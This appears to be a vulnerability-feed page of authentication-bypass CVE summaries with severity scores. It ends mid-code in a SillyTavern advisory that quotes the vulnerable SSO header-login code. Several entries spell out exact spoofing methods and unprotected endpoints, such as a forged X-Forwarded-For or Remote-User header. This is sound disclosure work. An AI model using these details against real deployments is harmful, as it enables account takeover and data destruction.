Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, TrustedNetworkAuthenticationHandler.ResolveClientIp parses the leftmost entry of the X-Forwarded-For header as the client IP. That entry is attacker-controlled - X-Forwarded-For is append-only, so the leftmost value is whatever the original HTTP client claimed. By sending a spoofed local IP in the header, an unauthenticated remote attacker passes the trusted-network check and is logged in as the Cleanuparr administrator. This vulnerability is fixed in 2.9.10.

Authentication Bypass
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31245 PyPI MEDIUM This Month

mem0 1.0.0 server accepts unauthenticated POST requests to the /memories endpoint, allowing remote attackers to inject arbitrary memory records without identity verification or authorization checks. This authentication bypass enables data pollution and unauthorized modification of the memory database with spoofed entries. EPSS exploitation probability is low (0.05th percentile), and no active exploitation has been confirmed, but the vulnerability is automatable and affects default configurations.

Authentication Bypass Mem0
NVD GitHub
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-31244 MEDIUM This Month

Unauthenticated deletion of arbitrary memory records in mem0 1.0.0 allows remote attackers to remove any database entry without credentials, causing unauthorized data loss and potential denial of service. The DELETE /memories/{memory_id} endpoint completely lacks authentication and authorization controls, exposing all memory records to deletion by any network-accessible attacker. No public exploit code has been identified, but the vulnerability is trivial to exploit given the straightforward API design.

Authentication Bypass Denial Of Service Mem0
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-31243 MEDIUM This Month

mem0 1.0.0 server allows unauthenticated remote attackers to trigger memory reset and table re-creation via unprotected DELETE /memories endpoint, causing schema disruption, data loss, and denial of service. The vulnerability exploits missing authentication and authorization controls on a database management operation accessible over the network without credentials.

Authentication Bypass Denial Of Service Mem0
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-29204 CRITICAL PATCH Act Now

Insufficient ownership checks in `clientarea.php` allow an authenticated client area user to submit requests using another user’s `addonId` without any ownership validation leading to unauthorized access to the victim's resources and their cPanel account.

Authentication Bypass PHP
NVD
CVSS 3.1
9.1
EPSS
0.0%
CVE-2025-43524 HIGH PATCH This Week

An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.2. An app may be able to break out of its sandbox.

Authentication Bypass Apple
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-42177 MEDIUM PATCH This Month

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

Authentication Bypass Mozilla Microsoft Google Chrome
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-42838 MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-40416 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-42832 HIGH PATCH This Week

Improper access control in Microsoft Office allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-42823 CRITICAL PATCH Exploit Unlikely Act Now

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-41613 HIGH PATCH Exploit Unlikely This Week

Session fixation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Session Fixation
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41103 CRITICAL PATCH NEWS Exploit Likely Act Now

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira &amp; Confluence allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Atlassian
NVD VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-40381 HIGH PATCH Exploit Unlikely This Week

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-41097 MEDIUM PATCH Exploit Unlikely This Month

Reliance on a component that is not updateable in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
6.7
EPSS
0.2%
CVE-2026-41086 HIGH PATCH Exploit Unlikely This Week

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40420 HIGH PATCH Exploit Unlikely This Week

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-32209 MEDIUM PATCH This Month

Improper access control in Windows Filtering Platform (WFP) allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-40367 HIGH PATCH NEWS This Week

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-33833 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Azure Machine Learning
NVD VulDB
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-35429 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
4.3
EPSS
0.1%
CVE-2026-42891 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-32161 HIGH PATCH NEWS Exploit Unlikely This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Authentication Bypass Microsoft Race Condition
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-41614 MEDIUM PATCH Exploit Unlikely This Month

Improper access control in M365 Copilot for Desktop allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass M365 Copilot For Desktop
NVD VulDB
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-41109 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to bypass a security feature over a network.

Authentication Bypass Visual Studio Code
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41102 HIGH PATCH This Week

Improper access control in Microsoft Office PowerPoint allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41101 HIGH PATCH This Week

Improper access control in Microsoft Office Word allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41100 MEDIUM PATCH This Month

Improper access control in M365 Copilot allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft 365 Copilot For Android
NVD VulDB
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-40364 HIGH PATCH NEWS Exploit Likely This Week

Access of resource using incompatible type ('type confusion') in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.1%
CVE-2026-35438 HIGH PATCH Exploit Unlikely This Week

Missing authorization in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.3
EPSS
0.1%
CVE-2026-35433 NuGet HIGH POC PATCH GHSA This Week

Improper input validation in .NET allows an unauthorized attacker to elevate privileges locally.

Authentication Bypass Net 10 0 Net 8 0 Net 9 0
NVD VulDB GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-35424 HIGH PATCH This Week

Missing release of memory after effective lifetime in Windows Internet Key Exchange (IKE) Protocol allows an unauthorized attacker to deny service over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-35422 MEDIUM PATCH This Month

Authentication bypass using an alternate path or channel in Windows TCP/IP allows an authorized attacker to bypass a security feature over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-33834 HIGH PATCH Exploit Unlikely This Week

Windows Event Logging Service privilege escalation allows local authenticated attackers with low-level privileges to gain SYSTEM-level control across Windows 10, Windows 11, and Windows Server 2012+ environments. The vulnerability requires no user interaction and has low attack complexity (AC:L), making exploitation straightforward once initial access is obtained. Microsoft has released patches via their March 2026 security updates, and exploitation requires only standard user credentials on vulnerable systems. CVSS 7.8 HIGH severity with complete compromise of confidentiality, integrity, and availability upon successful exploitation.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Incorrect Authorization in Palo Alto Networks Trust Protection Foundation allows adjacent-network unauthenticated attackers to bypass access controls and perform unauthorized actions against restricted resources. Affected version branches include 24.1.x, 24.3.x, 25.1.x, and 25.3.x, with fixed builds available from Palo Alto Networks. No public exploit identified at time of analysis, EPSS sits at the 1st percentile (0.01%), and SSVC rates exploitation as none - but the high availability impact component (VA:H in CVSS 4.0) on vulnerable systems makes patching a priority for organizations with exposed deployments.

Authentication Bypass Trust Protection Foundation
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Local privilege escalation in Palo Alto Networks Prisma Access Agent (all versions prior to 26.2.1) allows any locally authenticated non-administrative user to elevate to root on macOS and Linux, or NT AUTHORITY\SYSTEM on Windows, by exploiting a flawed privilege management mechanism. Successful exploitation grants full control of the affected endpoint, enabling arbitrary code execution and unauthorized access to data restricted to privileged accounts. No public exploit exists and the vulnerability is absent from CISA KEV; however, SSVC rates technical impact as total, making patching a meaningful priority for multi-user and enterprise endpoint environments.

Google RCE Apple +4
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Authorization bypass in Palo Alto Networks Prisma Access Agent's Endpoint DLP component permits a locally authenticated attacker with low privileges to circumvent authentication controls and invoke privileged operations. Affected are all Prisma Access Agent versions prior to 26.2.1, with full confidentiality, integrity, and availability impact on the vulnerable component confirmed by the CVSS:4.0 vector (VC:H/VI:H/VA:H). No active exploitation has been identified - SSVC marks exploitation as 'none', EPSS sits at the 1st percentile, and the CVSS exploit maturity is rated 'Unreported' (E:U).

Authentication Bypass Prisma Access Agent
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Improper certificate validation in Palo Alto Networks GlobalProtect App exposes macOS and Android users to adversary-in-the-middle attacks from locally adjacent network positions, enabling traffic interception and malicious software installation. The flaw allows an unauthenticated attacker on the same subnet - or a local non-administrative OS user - to redirect encrypted VPN communications to a rogue server by bypassing TLS certificate checks. No public exploit has been identified at time of analysis, EPSS is effectively zero, and CISA SSVC rates exploitation as none, though the high confidentiality and integrity impact on the vulnerable component warrants prompt patching on affected platforms.

Apple Paloalto Microsoft +2
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Unauthenticated access to an exposed Keycloak management service in the Arqit Symmetric Key Agreement Platform allows remote attackers to read sensitive operational data including application metrics and health status without any credentials. All versions of the platform prior to 26.03 are affected. The CVSS vector (PR:N/AC:L) confirms no authentication is required and exploitation is straightforward; however, EPSS at 0.01% (1st percentile) and SSVC exploitation status of 'none' indicate no public exploit or active targeting observed at time of analysis.

Authentication Bypass Symmetric Key Agreement Platform
NVD
EPSS 0% 4.6 CVSS 7.8
HIGH POC KEV PATCH THREAT Act Now

Authentication bypass in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS allows remote attackers to establish unauthorized VPN connections without valid credentials. The flaw is confirmed actively exploited (CISA KEV) and publicly available exploit code exists, though EPSS remains low at 0.05%, suggesting targeted rather than mass exploitation. Panorama and Cloud NGFW deployments are not affected, but PAN-OS firewalls and Prisma Access tenants running vulnerable trains are exposed.

Paloalto Authentication Bypass
NVD VulDB GitHub
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

Policy bypass in Palo Alto Networks Prisma® Browser allows a locally authenticated non-admin user to circumvent access and data control policies via a race condition, potentially exposing restricted data with high confidentiality impact to the vulnerable system. Affected versions span all releases prior to 146.16.6.165, per EUVD-2026-30087 and vendor advisory. No active exploitation is confirmed - the vulnerability is absent from CISA KEV, EPSS sits at 0.01% (3rd percentile), and SSVC assessment categorizes exploitation status as none - indicating this is a low-urgency but architecturally meaningful trust boundary weakness in an enterprise browser control product.

Paloalto Authentication Bypass Prisma Browser
NVD VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Local privilege escalation in Palo Alto Networks Prisma Browser on macOS allows a locally authenticated non-admin user to access an internal automation bridge that was insufficiently restricted, enabling unauthorized commands to be sent to the browser and bypassing built-in security controls. The flaw is tracked as CVE-2026-0237 with a CVSS 4.0 score of 7.3 and no public exploit identified at time of analysis, though SSVC rates the technical impact as total.

Apple Paloalto Authentication Bypass +1
NVD VulDB
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Authentication bypass in Palo Alto Networks PAN-OS allows unauthenticated network attackers to circumvent authentication controls when the Cloud Authentication Service (CAS) feature is enabled, with the highest risk when CAS is bound to the management interface. The flaw affects PA-Series and VM-Series firewalls as well as Panorama (virtual and M-Series); Cloud NGFW and Prisma Access are not impacted. No public exploit identified at time of analysis, and EPSS rates real-world exploitation probability low at 0.08%, but the high-value target profile and CWE-347 (Improper Verification of Cryptographic Signature) class - combined with the 'Jwt Attack' tag - warrant prompt patching.

Paloalto Authentication Bypass Jwt Attack +3
NVD VulDB
EPSS 0% CVSS 6.8
MEDIUM This Month

U-SPEED AC1200 Gigabit Wi-Fi Router Model T18-21K V1.0 exposes an unauthenticated UART serial interface that grants unrestricted access to device functionality upon physical connection. An attacker with physical access to the exposed UART pins can bypass all authentication and authorization controls to gain full device compromise. EPSS exploitation probability is low (0.03%), reflecting the physical access requirement, though the impact of successful exploitation is severe (confidentiality, integrity, and availability compromise).

Authentication Bypass T18 21K Firmware
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Authorization bypass in SiYuan note-taking platform versions up to and including v3.6.5 allows publish-mode Readers (anonymous visitors) and read-only Editors to invoke eight state-mutating APIs that are missing CheckAdminRole and CheckReadonly middleware. Attackers with only basic CheckAuth (including unauthenticated publish visitors) can rewrite the workspace conf.json, manipulate cloud sync intervals, overwrite graph configuration, poison the SQL block index, and tamper with the admin's recent-documents list. No public exploit identified at time of analysis, but a detailed PoC accompanies the advisory and EPSS sits at 0.04% (12th percentile).

Authentication Bypass Information Disclosure Docker
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Unauthenticated Solr streaming expression injection in Goobi viewer Core (versions 4.8.0 through 26.04) allows remote attackers to fully read, modify, or delete the backend Solr index by posting arbitrary expressions to the `/api/v1/index/stream` endpoint. No public exploit identified at time of analysis, but the vulnerability is trivially exploitable with CVSS 9.8 and bypasses access-condition protections such as moving walls and licence restrictions. EPSS is currently low (0.04%) reflecting the niche audience rather than technical difficulty.

Authentication Bypass Apache Tomcat
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Broken access control in SiYuan's publish-service API allows authenticated RoleReader principals to enumerate workspace metadata from notebooks explicitly marked as private or publish-ignored. Four search endpoints - `/api/search/searchTag`, `/api/search/searchAsset`, `/api/search/searchWidget`, and `/api/search/searchTemplate` - pass the `CheckAuth` middleware that a publish-service RoleReader JWT satisfies, but never apply the `IsReadOnlyRoleContext` filtering logic that sibling endpoints in the same file correctly implement, returning unscoped global workspace results. A proof-of-concept exploit exists per SSVC assessment and is documented in the advisory; the vulnerability is not currently listed in CISA KEV.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Broken access control in SiYuan's `/api/tag/getTag` endpoint (versions prior to 3.7.0) allows any authenticated low-privilege user - including publish-service `RoleReader` accounts and `RoleEditor` accounts on read-only workspaces - to mutate the global `Conf.Tag.Sort` configuration value and trigger a full rewrite of the workspace `conf.json` file. The handler silently executes a privileged write operation (`model.Conf.Save()`) when a `sort` argument is present, despite the endpoint being registered with only `model.CheckAuth` middleware, omitting the `model.CheckAdminRole` and `model.CheckReadonly` guards that sibling write endpoints correctly enforce. Publicly available exploit code exists per SSVC assessment, though no active exploitation has been confirmed (not in CISA KEV; EPSS 0.03%).

Authentication Bypass Docker
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Nautobot's REST API fails to enforce user 'view' permissions when resolving GenericForeignKey references during object creation or update, allowing authenticated users to create cross-object associations to records they are explicitly denied access to view. Any Nautobot user holding write access to an affected model - including ImageAttachment, Cable, Note, ContactAssociation, and over a dozen others - can link those records to restricted objects (e.g., Devices) if they know the target's UUID through any side channel. No public exploit has been identified and this vulnerability is not listed in CISA KEV; EPSS of 0.02% (6th percentile) reflects low probability of automated exploitation, though the authorization bypass is straightforward once credentials and a target UUID are in hand.

Authentication Bypass
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

Unauthorized write access to Traefik's live dynamic configuration is achievable by a low-privileged Kubernetes tenant in shared Gateway deployments, because the Gateway API provider's `isInternalService()` check accepts any `TraefikService` name ending in `@internal` - not exclusively the intended `api@internal`. This allows a tenant with `HTTPRoute` creation rights to route external traffic to `rest@internal`, fully bypassing the `providers.rest.insecure=false` safeguard and gaining `PUT /api/providers/rest` write access. No active exploitation is confirmed (not in CISA KEV, EPSS at 0.01%), but a detailed proof-of-concept is published in the GHSA advisory and the SSVC framework marks the attack as automatable for tenants meeting the prerequisites.

Denial Of Service Authentication Bypass Kubernetes
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

A race condition in the Linux kernel's sched_ext BPF scheduler subsystem allows a local low-privileged user to permanently hang the system when sched_ext is actively loaded. Between scx_claim_exit() atomically marking error exit and the subsequent kick of the helper kthread, a preemption window exists where the BPF scheduler - now with error handling disabled - may fail to reschedule the calling task, leaving the helper work permanently unqueued. The result is bypass mode never activating, task dispatching halting, and a complete system wedge. No public exploit has been identified and EPSS sits at 0.02% (5th percentile), but the availability impact is total for affected systems running a custom BPF scheduler.

Authentication Bypass Linux Red Hat +1
NVD VulDB
EPSS 0% CVSS 8.7
HIGH POC This Week

Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Huawei Authentication Bypass
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

NGINX Plus and NGINX Open Source configured with the HTTP/3 QUIC module allows unauthenticated remote attackers to spoof source IP addresses, enabling bypass of authorization checks and rate-limiting controls. The vulnerability affects both commercial and open-source variants when QUIC is explicitly enabled, with patches available from F5.

Authentication Bypass Nginx Nginx Plus +1
NVD VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Authenticated administrators in F5 BIG-IP Appliance mode can bypass configuration restrictions designed to prevent system-level access. Administrators with the 'Administrator' role can circumvent Appliance mode lockdown controls, potentially modifying underlying system configurations that should be protected in this deployment mode. Vendor patch available per F5 Security Advisory K000160876. CVSS 8.5 reflects high confidentiality/integrity impact despite requiring privileged authentication.

Authentication Bypass Big Ip
NVD VulDB
EPSS 0% CVSS 6.0
MEDIUM This Month

Improper Input Validation in the NAT64 translator in The OpenThread Authors OpenThread before commit 26a882d on all platforms allows an attacker on the adjacent IPv4 network to inject corrupted IPv6 packets into the Thread mesh or bypass security checks via crafted IPv4 packets with options.

Authentication Bypass Openthread
NVD GitHub
EPSS 0% CVSS 7.1
HIGH This Week

Authenticated subscribers can bypass authorization gates and forcibly join any ProfileGrid group - including closed, paid, or restricted groups - through a missing capability check in the pm_invite_user function. Affects all ProfileGrid plugin versions up to 5.9.8.4. The vulnerability enables low-privilege users to circumvent membership restrictions and payment requirements, potentially exposing premium content and private community spaces. EPSS data not provided; no CISA KEV listing identified, indicating no confirmed widespread exploitation at time of analysis. CVSS 7.1 reflects high integrity impact due to authorization bypass capabilities.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Authentication bypass in ProfileGrid - User Profiles, Groups and Communities WordPress plugin up to version 5.9.8.4 allows authenticated Subscriber-level users to modify site-wide group settings through unprotected AJAX actions (pm_set_group_order, pm_set_group_items, pm_set_field_order). Attackers can alter group menu order, list order, icon display, and field ordering without authorization checks. No public exploit code or active exploitation has been identified; CVSS 4.3 (low-moderate severity) reflects limited impact scope to integrity without confidentiality or availability impact.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

RTMKit Addons for Elementor plugin for WordPress allows authenticated attackers with Author-level access or higher to modify or reset site-wide widget configurations due to missing capability checks in the save_widget() and reset_all_widgets() functions. This privilege escalation vulnerability affects all versions up to 2.0.2 and enables unauthorized modification of widget data across the entire WordPress site, impacting site integrity and user experience.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 5.3
MEDIUM This Month

Authenticated attackers with Subscriber-level access can modify the API key stored in the Hostinger Reach WordPress plugin (versions up to 1.3.8) due to missing capability checks in the AJAX handler, but only when the plugin is not yet connected to a site and the database contains no existing API key. The vulnerability allows unauthorized data modification via the 'hostinger_reach_connection_notice_action' action with CVSS 5.3 (network-accessible, high integrity impact, but requiring low-privilege authentication and non-standard conditions).

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 6.0
MEDIUM This Month

Incorrect authorization in the "submitted together" feature in Gerrit versions 2.12 and later allows an authenticated attacker with force push permissions on a secondary branch to bypass code review and forcefully submit code to restricted branches via a crafted submission matching the "topic" tag of an unapproved change.

Authentication Bypass Gerrit
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Authenticated instructors in Tutor LMS versions up to 3.9.9 can manipulate course ownership logic via an attacker-controlled GET parameter to perform unauthorized operations on other instructors' courses, including deleting lessons, quizzes, assignments, and student data, or modifying course content and grades. The vulnerability stems from the `get_course_id_by()` function unconditionally trusting user-supplied input instead of validating course ownership, bypassing the plugin's primary authorization gate. No public exploit code or active exploitation has been identified at time of analysis.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated attackers can retrieve any support ticket content from the ilGhera Support System for WooCommerce plugin (versions up to 1.3.0) by exploiting a missing capability check in the 'get_ticket_content_callback' function, exposing sensitive customer data and private communications without authentication. The vulnerability requires only a valid ticket ID and network access, with no active public exploitation confirmed at time of analysis, but the low attack complexity and unauthenticated nature make it practically exploitable against any WordPress site running the affected plugin.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress versions up to 8.9.0 allows authenticated attackers to delete any user's published and scheduled social media post records due to missing ownership verification in the deleteUserPublishPost() and deleteUserSchedPost() functions. Attackers can supply arbitrary sequential post IDs to permanently soft-delete other users' B2S post records, disrupting content publishing workflows across multiuser WordPress installations. This vulnerability requires valid WordPress user authentication but no elevated privileges.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Broadstreet WordPress plugin up to version 1.53.1 allows authenticated attackers with Subscriber-level access to create advertisers via missing capability checks on the create_advertiser AJAX action, enabling privilege escalation and unauthorized modification of advertising data.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated attackers can manipulate product prices in WooCommerce carts via an unprotected AJAX action in the Cost Calculator Builder plugin for WordPress (versions up to 4.0.1) when used with Cost Calculator Builder PRO. The vulnerability stems from the ccb_woocommerce_payment AJAX endpoint being registered without authentication requirements (wp_ajax_nopriv) and failing to validate user input before passing it to checkout initialization, allowing price modification without authorization. This is an Insecure Direct Object Reference (IDOR) flaw with moderate CVSS score (5.3) that enables integrity violations but not confidentiality breaches or availability impact.

Authentication Bypass WordPress
NVD
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

OpenLearnX versions prior to 2.0.4 contain a critical authentication bypass vulnerability caused by disabled JWT signature verification, enabling unauthenticated attackers to gain unauthorized access to user accounts. The vulnerability has been patched in version 2.0.4. No public exploit code or active exploitation has been identified at time of analysis.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Authentication bypass in Garmin WDU v1 1.4.6 and v2 5.0 allows remote unauthenticated attackers to execute arbitrary commands via WebSocket API. The web interface implements client-side-only authentication while the WebSocket backend enforces no authentication, enabling complete bypass by directly accessing remote APIs. With CVSS 7.3 (AV:N/AC:L/PR:N) but only 0.03% EPSS probability, this represents a critical design flaw in deployed devices rather than actively exploited widespread threat. No public exploit identified at time of analysis.

Authentication Bypass
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, Broken Access Control allows reading of sketch logs from any user. This vulnerability is fixed in 1.2.3.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 2.3
LOW Monitor

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, an adversary with knowledge of an investigation ID, could update the metadata of an investigation of another user. This vulnerability is fixed in 1.2.3.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data.

Authentication Bypass Gojobs
NVD GitHub
EPSS 0% CVSS 9.6
CRITICAL Act Now

ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1.

Authentication Bypass PHP
NVD GitHub
EPSS 0% CVSS 7.1
HIGH This Week

The MonsterInsights - Google Analytics Dashboard for WordPress (Website Stats Made Easy) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability checks on the get_ads_access_token() and reset_experience() functions in all versions up to, and including, 10.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve live Google OAuth access tokens and reset Plugins's Google Ads integration.

Authentication Bypass WordPress Google
NVD
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

## Resolution SillyTavern 1.18.0 now includes a configuration option to limit which IP addresses can authorize using SSO headers, limiting to just loopback addresses by default. A setting can be customized according to user's needs. Documentation: https://docs.sillytavern.app/administration/sso/ ## Summary SillyTavern accepts `Remote-User` (Authelia) and `X-Authentik-Username` (Authentik) HTTP headers to automatically log in users when SSO is configured. There is no validation that these headers originate from a trusted reverse proxy. Any network client that can reach the SillyTavern port directly can inject these headers and authenticate as any user, including administrators, without a password. This vulnerability is exploitable only when `sso.autheliaAuth: true` or `sso.authentikAuth: true` is set in `config.yaml` (both default to `false`). ### Detials SillyTavern implements header-based SSO for Authelia and Authentik. When enabled, the `tryAutoLogin` function (called on every request to `/login`) invokes `headerUserLogin`, which reads an HTTP header set by the upstream proxy and automatically creates an authenticated session for the matching user: `src/users.js:779-801`: ```js async function headerUserLogin(request, header = 'Remote-User') { if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. ### User Enumeration Pre-Condition The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if 